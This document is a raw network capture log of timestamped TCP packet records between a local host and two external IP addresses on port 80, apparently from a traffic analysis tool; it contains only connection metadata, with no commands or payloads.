Dec 12, 2024 16:48:47.199544907 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.199562073 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.200445890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.200782061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.200881958 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.201452017 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.201528072 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.201617002 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.202560902 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.244143009 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.291063070 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.291162014 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.291260004 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.291503906 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.291559935 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.291755915 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.292023897 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.292555094 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.292599916 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.292850018 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.292891979 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.293423891 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.293469906 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.294433117 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.294445992 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.294460058 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.294496059 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.294531107 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.295402050 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.295469999 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.295542955 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.295600891 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.296375990 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.296874046 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.296930075 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.297343016 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.297386885 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.297804117 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.297838926 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.298336983 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.298441887 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.298489094 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.299331903 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.299391985 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.299595118 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.299645901 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.300272942 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.300326109 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.300394058 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.300438881 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.301280975 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.301331043 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.301362038 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.301403046 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.302243948 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.302290916 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.302293062 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.302330971 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.303198099 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.303246021 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.303320885 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.303366899 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.304193974 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.304305077 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.304359913 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.304359913 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.305145979 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.305186987 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.305236101 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.306126118 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.306176901 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.306509972 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.306593895 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.307091951 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.307141066 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.307502031 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.307552099 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.308078051 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.308130980 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.308186054 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.309178114 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.309230089 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.309586048 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.309629917 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.310055017 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.310096025 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.310142994 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.310182095 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.311041117 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.311098099 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.311336040 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.311384916 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.312050104 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.312138081 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.312191010 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.313024998 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.313071012 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.313103914 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.313143015 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.314045906 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.314065933 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.314099073 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.314121008 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.314923048 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.314971924 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.315016985 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.315058947 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.316096067 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.316909075 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.316963911 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.317198992 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.317240000 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.317253113 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.317286968 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.318111897 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.318162918 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.318409920 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.318454981 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.318953991 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.318998098 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.319179058 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.319216967 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.319927931 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.319998026 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.320048094 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.320785046 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.320831060 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.320919991 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.320961952 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.321783066 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.321839094 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.321890116 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.321933031 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.322720051 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.322763920 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.323604107 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.323657990 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.323983908 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.324023008 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.324134111 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.324177027 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.324960947 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.325007915 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.325366974 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.325411081 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.325737953 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.325783014 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.325810909 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.325850964 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.326647997 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.326695919 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.327167034 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.327210903 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.327640057 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.327927113 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.327967882 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.328689098 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.328731060 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.328957081 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.329003096 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.329603910 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.329617023 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.329652071 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.330590963 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.330643892 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.330688953 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.330730915 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.331525087 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.331568003 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.331922054 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.332521915 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.332575083 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.333215952 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.333261013 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.333458900 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.333498955 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.333604097 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.333646059 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.334462881 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.334506035 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.335095882 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.335139036 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.335433960 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.335484028 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.336086035 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.336528063 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.336571932 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.337416887 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.337423086 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.337428093 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.337456942 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.337475061 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.338382006 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.338557959 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.338604927 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.339339972 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.339389086 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.339505911 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.339545012 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.340374947 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.340652943 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.340706110 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.341326952 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.341370106 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.341430902 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.341468096 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.341564894 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.341737986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.342113018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.342221975 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.342276096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.342298031 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.342355013 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.342391968 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.343117952 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.343324900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.343709946 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.344126940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.344343901 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.345118046 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.345192909 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.345828056 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.346381903 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.346391916 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.346457005 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.346473932 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.347152948 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.347450972 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.347521067 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.348151922 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.349252939 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.349261999 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.349307060 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.349344969 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.350219965 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.350256920 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.350858927 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.351289034 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.351298094 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.351361990 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.351377010 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.352277040 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.353305101 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.353321075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.353338003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.353385925 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.353420973 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.354270935 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.355319023 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.355329990 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.355340958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.355424881 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.356318951 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.356482983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.356569052 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.357285023 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.357441902 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.358356953 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.358417034 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.358438015 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.358449936 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.359328032 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.359534979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.359618902 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.360337973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.361540079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.361551046 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.361593008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.361624956 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.361641884 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.362601995 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.362612009 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.362682104 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.364552975 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.364738941 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.364835024 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.365211010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.365446091 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.365883112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.365958929 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.365979910 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.366590023 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.366667032 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.366904020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.366974115 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.367539883 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.367969990 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.368648052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.368721962 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.368732929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.369565010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.369566917 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.369663954 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.370592117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.370676041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.370913982 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.371617079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.371823072 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.372528076 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.372608900 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.372611046 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.373022079 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.373639107 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.373650074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.373729944 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.374553919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.375869036 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.375879049 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.375963926 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.375987053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.376887083 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.376986027 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.377135038 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.377202034 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.377799034 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.377809048 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.377880096 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.378653049 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.378995895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.379698992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.379709959 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.379968882 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.380109072 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.380636930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.381676912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.381686926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.381757021 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.381772995 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.381817102 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.382666111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.382855892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.382915974 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.383708000 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.383899927 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.383987904 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.384706020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.385205984 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.385292053 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.385704041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.386157990 CET	80	49946	185.81.68.147	192.168.2.10
